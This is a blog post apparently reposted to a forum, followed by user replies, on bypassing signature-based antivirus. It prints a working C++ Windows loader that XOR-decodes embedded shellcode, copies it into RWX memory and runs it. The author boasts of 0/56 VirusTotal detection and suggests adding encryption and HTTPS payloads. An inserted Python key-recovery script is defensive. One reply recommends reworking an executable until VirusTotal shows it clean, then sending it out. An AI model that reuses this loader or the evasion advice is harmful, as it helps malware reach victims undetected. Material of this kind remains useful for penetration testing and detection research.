Bypassing Antivirus With Ten Lines of Code or (Yet Again) Why Antivirus is Largely Useless


steven36


I had originally set out to write a long winded blog post on different antivirus bypass techniques. I went through what was supposed to be step 1 of my guide and uploaded my resultant binary to virustotal. To my complete and utter shock, the binary got a 0/56 detection rate. I decided to throw out my long winded idea and move forward with this quick, dirty, and unbelievably easy method.

 
I believe that most of my readers would agree with me that bypassing most antivirus based solutions is rather trivial; however, I do occasionally bump into some people who solely rely on tools that generate binaries that can easily be fingerprinted and flagged by antivirus solutions. This article is largely intended for that audience.

Before I dive in to this small tidbit of C++ code, I'd like to touch on a tool that is really good at producing binaries that almost always evade detection, Veil-Evasion (part of the Veil-Framework). This tool is awesome (many thanks to @harmj0y and others for creating and contributing to this awesome project) and in almost all instances I have had to use it has not let me down. If it has, I blame people who keep generating binaries and then testing them on virustotal. If you people could stop doing that, that would be great.

At any rate, this begs the question: if tools like Veil Evasion are so epic, why should you care about knowing how to slap together a binary with a shellcode payload yourself? Well, there are a number of reasons:
 
  • People get busy and tools become deprecated
  • The binaries generated by tools become fingerprintable; not the payload necessarily, but the compiled structure of the binary.
  • As a penetration tester, you should really know how to do this. Ups your leet cred.. or so I hear.

 

Before you take a look at the below code, it's worth noting that this is targeting the Windows platform, as obviously noted with the reference to windows.h ;)

 
#include <windows.h>
#include <iostream>
#include <cstring>   // memcpy

int main(int argc, char **argv)
{
    // The payload bytes go here, already XORed with the key 'x' (e.g. 0x4C,0x4F,0x4C)
    char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
    char c[sizeof b];
    // Decode: XOR every byte with the same single-byte key
    for (int i = 0; i < sizeof b; i++) { c[i] = b[i] ^ 'x'; }
    // Allocate RWX memory, copy the decoded bytes in, and call them
    void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, c, sizeof c);
    ((void(*)())exec)();
}

Quite simply, the above code creates a character array with shellcode you can add, performs an XOR operation with the incredibly sophisticated key of lowercase 'x', allocates some memory, copies the character array into said allocated memory, and executes it. It may be worth highlighting that you will need to XOR your shellcode with your key of choosing (in this case 'x') before you put it in the above code and compile.

So you are probably looking at that and thinking 'really?' - I know how you feel. This is how I felt after I intended this to be step 1 of my tutorial and I ran it through virustotal and it returned 0/56 detection. I'd like to stress that this is an incredibly simple and most basic technique, yet its success is still rather astonishing.

I originally wrote this example and tested it on virus total a while ago, but I did reanalyze the executable on virustotal at the time of publishing this post and found it still had a 0 detection rate.
 
 
The binary you generate will very likely not match the SHA256 of the binary I have tested; the binary I uploaded contained shellcode generated with the metasploit framework.
 

Final Comments

Alright, so antivirus is dead. We all know that. That being said, we can't argue that over 95% of organizations are still depending on antivirus to protect endpoints. 
 
Is there a better way? Certainly. A number of vendors, which I shall not name, have launched products that take a new approach to protecting endpoints, primarily focusing on identification of known exploit techniques. This is usually performed by way of injecting DLLs into processes that will monitor for these known techniques and prevent the exploit from working successfully.
 
Is this a foolproof technique? I would be inclined to say no. The bar will be raised, but a new type of cat and mouse game will begin.

Final note: The above may not work on _all_ antivirus solutions. I figure that was obvious, but thought I would mention it before the pitch forks come after me!

Wow. This post blew up a lot more than I intended it to. Please bear in mind that this article was targeted at penetration testers. The goal was to demonstrate an extremely simplistic signature based AV bypass technique. I didn't point out 'signature' as I assumed it was obvious that heuristics capabilities would very likely pick this up - although it really depends on your payload more than anything else. I don't advocate using this technique over infinitely more sophisticated implementations that can be found in Veil-Framework or Shellter. Think of the above code as a template - get creative - make the encoding routine more complicated - maybe implement encryption with key bruteforcing? Then maybe add some prime number generation at the get go to throw off heuristics if you want to be fancy. Use payloads that communicate over HTTPS as well. Sky's the limit - this was just a super fundamental example.
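A defender-side view of the loader above, added here as an example (it is not code from the article, Veil or any AV product): XORing with a single byte leaves only 256 possible keys, so a static scanner can XOR each known payload pattern with every candidate key and search the raw bytes for the result, never decoding the blob at all. The signature list, the stand-in payload and the container bytes are constructed for illustration.

```python
"""Recover a single-byte XOR key from a blob without decoding it 256 times.

Added example. Instead of decoding the whole blob per key, each known
signature is XORed with the candidate key and searched for directly in the
raw bytes, the approach tools such as xorsearch take.
"""
import re
from typing import Optional, Tuple

# Constructed signature list. The first entry is the prologue commonly seen at
# the start of Metasploit x64 stagers (cld; and rsp,-0x10); the other two are
# plain strings that unencoded payloads frequently carry.
SIGNATURES = [b"\xfc\x48\x83\xe4\xf0", b"ws2_32", b"cmd.exe"]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the loader's decode step)."""
    return bytes(b ^ key for b in data)


def parse_c_array(source: str) -> bytes:
    """Pull the 0xNN initialisers out of a C array like the loader's `char b[]`."""
    return bytes(int(h, 16) for h in re.findall(r"0x([0-9A-Fa-f]{2})", source))


def find_xor_key(blob: bytes, signatures=SIGNATURES) -> Optional[Tuple[int, int, bytes]]:
    """Return (key, offset, signature) for the first key under which a known
    signature appears in blob, or None. Key 0 covers unencoded data."""
    for key in range(256):
        for sig in signatures:
            off = blob.find(xor_bytes(sig, key))
            if off != -1:
                return key, off, sig
    return None


# Constructed stand-in for a payload: prologue bytes, NOP filler and two
# strings. It is not executable shellcode, only bytes carrying the signatures.
FAKE_PAYLOAD = b"\xfc\x48\x83\xe4\xf0" + b"\x90" * 6 + b"ws2_32\x00cmd.exe\x00"


def demo() -> Optional[Tuple[int, int, bytes]]:
    """Encode the stand-in with the article's key 'x', embed it in a constructed
    container (an MZ stub plus padding) and recover key and offset."""
    encoded = xor_bytes(FAKE_PAYLOAD, ord("x"))
    container = b"MZ" + b"\x00" * 16 + encoded + b"\x00" * 16
    return find_xor_key(container)


if __name__ == "__main__":
    hit = demo()
    if hit:
        key, off, sig = hit
        print(f"key=0x{key:02x} ({chr(key)!r}) offset={off} signature={sig!r}")
```

Feeding the loader's source through parse_c_array and then find_xor_key recovers the key the same way, which is why a single-byte XOR only defeats scanners that never try it.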
 
 

People should know by now that the traditional fingerprinting method is just a tiny fraction of the protection capability of antiviruses. VirusTotal basically only uses this; that's why there is zero out of whatever value. All AVs today use cloud based systems, runtime heuristics and behavior analysis not employed on VirusTotal.

 

Make a test against antiviruses by actually executing the file, and if it still bypasses so many of them, then I'll agree. But to be honest, I already know that won't be the case. You can't fool behavior based detections with 10 lines of code. Maybe a very basic pattern match engine, but not a behavior one.



17 minutes ago, RejZoR said:

People should know by now that the traditional fingerprinting method is just a tiny fraction of the protection capability of antiviruses. VirusTotal basically only uses this; that's why there is zero out of whatever value. All AVs today use cloud based systems, runtime heuristics and behavior analysis not employed on VirusTotal.

 

Make a test against antiviruses by actually executing the file, and if it still bypasses so many of them, then I'll agree. But to be honest, I already know that won't be the case. You can't fool behavior based detections with 10 lines of code. Maybe a very basic pattern match engine, but not a behavior one.

It used to be really easy, if you got a false positive with DUP patchmaker, to just use a certain file packer and remove the false positives. Back in like 2008 I got an infected keygen that bypassed Kaspersky; it only had 2 hits on VT, so I don't think it would be impossible to alter the code. Kaspersky had saved me a 100 times before, but all it takes is one skilled malware writer to get around most antivirus. DR. PC Puttie had something he used to hide false positives too, but he was a good cracker. There's lots of things out there that can be used to get around it if an antivirus doesn't have the signature. That's why it's best to use an antivirus that has anti-exploit.



Nothing is 100% in this world. Antidotes don't work 100% of the time, vaccines don't either and neither do airbags and seatbelts or circuit breakers. There will ALWAYS be at least one situation when one of these will fail. It's just how it is. But if your chance of that happening to you is 10:1 or 10.000.000:1, that makes a huge difference.



13 minutes ago, RejZoR said:

Nothing is 100% in this world. Antidotes don't work 100% of the time, vaccines don't either and neither do airbags and seatbelts or circuit breakers. There will ALWAYS be at least one situation when one of these will fail. It's just how it is. But if your chance of that happening to you is 10:1 or 10.000.000:1, that makes a huge difference.

You remember MeGaHeRTZ? I never used any of their cracks, but they put out Trojan-laced patches in the scene for a long time unnoticed. All it takes is some bad actors to infect millions of people easily.

http://scenenotice.org/details.php?id=2190

 

The year they were around, 2013, everything they did was nuked with the reason: contains.trojan. They didn't catch on to it till almost a year later.



Rejigger EXE until clean VirusTotal (or good enough), then send it out. I've uploaded malware from ransomware stricken PCs after the fact and most AV failed to see it for what it was.

 

Kaspersky detected it, FYI.



10 minutes ago, CODYQX4 said:

Rejigger EXE until clean VirusTotal (or good enough), then send it out. I've uploaded malware from ransomware stricken PCs after the fact and most AV failed to see it for what it was.

 

Kaspersky detected it, FYI.

 

With cloud systems and automated detection systems cloud side, things aren't as simple. You may bypass VT, but clouds are very unpredictable for malware writers. They can test offline and bypass it, but once cloud networks notice such files, they quickly get detected and become worthless. If they test online, that happens already during testing. They have quite a lot more work to do than before. And that's good.



33 minutes ago, CODYQX4 said:

Rejigger EXE until clean VirusTotal (or good enough), then send it out. I've uploaded malware from ransomware stricken PCs after the fact and most AV failed to see it for what it was.

 

Kaspersky detected it, FYI.

Yes, there's most of the time 1 or 2 that will detect any malware, but in some cases Kaspersky won't. So unless you had all antivirus installed at once, what good is it? Even the OP says that much; he's not saying that none will detect it. But I've had antivirus detect legit programs as false positives before that didn't show up on VT, so protection can be very misleading to any noob. I don't use an antivirus on Linux, but I still do on Windows. But the last time I remember any of them getting me out of a real jam was back in the 1st decade of the 21st century. They just call out false positives.

 
